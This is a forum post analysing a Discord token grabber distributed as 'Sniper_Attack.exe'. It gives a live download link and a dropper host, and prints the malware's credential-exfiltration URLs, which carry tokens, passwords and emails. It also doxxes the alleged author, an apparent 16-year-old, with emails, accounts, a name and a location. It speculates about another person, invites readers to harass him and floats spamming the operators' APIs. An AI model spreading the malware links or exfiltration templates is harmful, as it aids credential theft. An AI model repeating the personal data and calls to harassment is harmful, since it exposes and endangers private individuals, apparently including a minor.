Popup - http://cdn.discordapp.com/attachments/911128608729358346/911558951152255016/Sniper_Attack.exe
VirusTotal - VirusTotal - File - e5994d21ed90e936d1fc54a6d12ee45da88ed4e83542be4790011cb969d7087f
Program contains the HEUR:Trojan-PSW.Win32.Disco.gen trojan and functions as a Discord tokener.
Yay, there’s another contester to the “You think your skidded malware can hack everybody” show?
It’s another PrimeFA sample AFAIK. I am too poor to do proper dynamic analysis on my HW and from the looks of it it’s skidded anyways. Shame on AVs on not even detecting a literally open source skidded grabber. Boo !
Anyways yes, uploading ALL of their stuff to VT, just because they told me not to.
Infection detection:
HTTP: http://primefa.xyz/injection sample grabs the grabber from here (to avoid detection) → exe literally just a dropper
For now it drops the credentials to https://p9iprsfdr7.execute-api.us-east-2.amazonaws.com/default/EmailChanged?token=${o}&auth=${auth}&psd=${psw}&email={email} and
https://1m3bmndg3i.execute-api.us-east-2.amazonaws.com/default/Logged?token=${o}&auth=${auth}&psd=${psw} and
https://sd8bzuhwv6.execute-api.us-east-2.amazonaws.com/default/PassChanged?token=${o}&auth=${auth}&psd=${psw}&oldpsd=${e}
idk what the fuck the auth parameter is supposed to be but maybe its the string “__AUTH__”
The devs are cocky enough to leave you an invite to a Discord server when you attempt to connect to these servers if your packets are too sus
This server conversations speaks for itself:
Hmm love my [[Premium]] (education purpose) skidded malware
yah it’s a resell of an open-source trash grabber and even the original author hates this guy.
Looks like this guy got dropped before I even got here so most info is stale as a bread. But please give this benchod a run for the buck 
INFO:
[email protected]
[email protected]
Nithish#5099 - NithishCodez
x.com and NithishCodez (Nithish Pravin) · GitHub
https://nithishpravin.xyz/ - Nithish Pravin, 16yo, Chennai, Tamil Nadu - likely a persona
https://www.youtube.com/channel/UC_M6GWo7ZcmUVzssGi7i5Iw
SPECULATION: might be an alt of khalby78 and I have researched that thoroughly (and archived EVERYTHING in case I am right) but there’s a possibility that this acc is a decoy designed to hurt the lad (who seems to be living quite a public life on the Internet) so I will leave that up to when evidence linking the two properly emerges.
P. S. If you wanna go bother the actual devs of this original skidware, go to go6 [closed]
Still care any about this? Even as of today it’s still going around and I’m trying to write up a script to spam their APIs with junk tokens. If you wanna offer any help it would be cool.
Yo kekami pl send me this guy discord id, he frauded me as well
